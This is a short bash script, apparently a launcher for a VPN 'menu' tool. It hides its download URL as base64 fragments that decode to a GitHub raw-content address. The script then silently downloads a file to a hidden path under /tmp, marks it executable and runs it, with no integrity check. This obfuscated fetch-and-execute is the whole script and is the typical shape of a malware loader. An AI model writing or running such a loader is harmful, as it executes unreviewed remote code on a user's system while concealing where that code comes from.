#!/bin/bash

download_menu_script() {
  decode() {
    echo "$1" | base64 -d
  }

  p1=$(decode "aHR0cHM6")
  p2=$(decode "Ly8=")
  p3=$(decode "cmF3")
  p4=$(decode "LmdpdGh1Yg==")
  p5=$(decode "dXNlcmNvbnRlbnQuY29t")
  p6=$(decode "L2hxLW1w")
  p7=$(decode "L3ppLXZwbi5jb20=")
  p8=$(decode "L3JlZnMvaGVhZHM=")
  p9=$(decode "L21haW4vbWVudQ==")

  full_url="${p1}${p2}${p3}${p4}${p5}${p6}${p7}${p8}${p9}"

  curl -s "$full_url" -o /tmp/.zi_menu
  chmod +x /tmp/.zi_menu
  bash /tmp/.zi_menu
}

download_menu_script
